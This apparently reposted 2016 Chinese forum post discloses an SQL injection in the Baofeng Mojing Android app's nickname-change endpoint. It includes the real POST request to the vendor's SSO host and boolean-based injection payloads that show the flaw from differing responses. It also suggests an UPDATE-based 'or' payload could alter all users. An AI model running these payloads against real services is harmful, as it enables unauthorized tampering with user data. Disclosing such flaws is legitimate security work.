HanDs
管理员

[7月漏洞公开] 暴风魔镜app一处SQL注入 



详细说明:

目标:暴风魔镜Android APP

注入点:昵称修改处,(POST中的user_name)

code 区域
POST http://sso.mojing.cn/user/api/setusername HTTP/1.1
User-Agent: gzip
Accept-Encoding: gzip
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: sso.mojing.cn
Connection: Keep-Alive

open_id={"user_no":"3966439149277372","user_name":"ygghghhhhh","open_verify":"02bfa964e59d293c7f811bcb9bd9d19d"}

漏洞证明:

证明如下:

首先,不妨新建一个奇葩点的用户名,如

code 区域
ygghghhhhh



此时,如果我们修改为同样的用户名ygghghhhhh,则提示用户名已存在

1.jpg



接着,我们修改昵称为

code 区域
ygghghhhhh' and 1=1 and 'a'=a'



此时,依然返回用户名已存在

2.jpg



于是,我们修改昵称为

code 区域
ygghghhhhh' and 1=2 and 'a'=a'



则返回修改成功

3.jpg



说明user_name处存在注入。

但由于此APP含sign校验(后面的open_verify参数),每个数据包随着参数值的变化都会生成单独的sign,因此难以通过批量发包来进行利用并跑库。

至于危害嘛,此处应为update注入,假如在app上修改昵称为or注入语句的话,有可能会影响全站用户……

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
暴风 魔镜 a pp
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复